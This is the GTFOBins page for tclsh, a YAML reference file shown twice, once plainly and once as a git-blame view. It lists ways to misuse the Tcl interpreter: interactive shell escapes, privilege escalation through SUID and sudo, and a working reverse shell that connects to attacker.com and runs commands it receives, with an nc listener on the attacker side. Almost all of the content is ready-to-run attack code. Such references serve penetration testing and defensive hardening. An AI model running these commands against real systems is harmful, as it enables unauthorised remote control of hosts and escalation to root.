GTFOBins.github.io/_gtfobins/tclsh.md

---
functions:
  execute-interactive:
    - code: |
        tclsh
        exec /bin/sh <@stdin >@stdout 2>@stderr
  reverse-shell-non-interactive:
    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
  suid-enabled:
    - code: |
        ./tclsh
        exec /bin/sh -p <@stdin >@stdout 2>@stderr
  sudo-enabled:
    - code: |
        sudo tclsh
        exec /bin/sh <@stdin >@stdout 2>@stderr
---
First commit 2018-05-21 21:14:41 +02:00			`---`
			`functions:`
Reorganize function names 2018-05-25 15:30:02 +02:00			`execute-interactive:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: \|`
			`tclsh`
			`exec /bin/sh <@stdin >@stdout 2>@stderr`
Introduce non-interactive reverse and bind shells 2018-05-23 09:06:50 +02:00			`reverse-shell-non-interactive:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
			`code: \|`
			`export RHOST=attacker.com`
			`export RPORT=12345`
			`echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' \| tclsh`
Reorder functions in binaries 2018-07-04 20:26:52 +02:00			`suid-enabled:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: \|`
			`./tclsh`
			`exec /bin/sh -p <@stdin >@stdout 2>@stderr`
Reorder functions in binaries 2018-07-04 20:26:52 +02:00			`sudo-enabled:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- code: \|`
			`sudo tclsh`
			`exec /bin/sh <@stdin >@stdout 2>@stderr`
Fix trailing spaces 2018-05-25 01:10:39 +02:00			`---`